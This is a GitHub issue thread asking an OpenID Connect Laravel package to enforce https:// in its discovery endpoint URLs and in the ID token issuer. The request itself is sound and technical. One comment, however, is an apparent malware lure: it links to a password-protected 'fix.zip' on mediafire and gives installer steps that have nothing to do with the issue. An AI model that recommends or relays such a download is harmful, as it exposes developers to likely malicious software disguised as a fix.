### ISSUE TITLE
Force https:// in discovery response and ID token's issuer

### ISSUE THREAD

**Issue by alecpl** [ronvanderheijden/openid-connect#28]
I know this is more of a Laravel general setting/problem, but would it be possible to force https:// in `DiscoveryController`?

There are `url()` and `route()` calls that all return `http://`, but I need them to be `https://`.

All URIs **MUST** use `https://` according to the [protocol spec](https://openid.net/specs/openid-connect-discovery-1_0.html#ProviderMetadata). So, I think it should be enforced in your code.

There's also a code in `IdTokenResponse::getBuilder()` that would need to return `https://` for the `$issuer`.

BTW: `URL::forceScheme('https');` does not fix issuer in `IdTokeResponse`, which might be a bug in itself.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alecpl** [comment]
Moved to https://github.com/jeremy379/laravel-openid-connect/issues/23
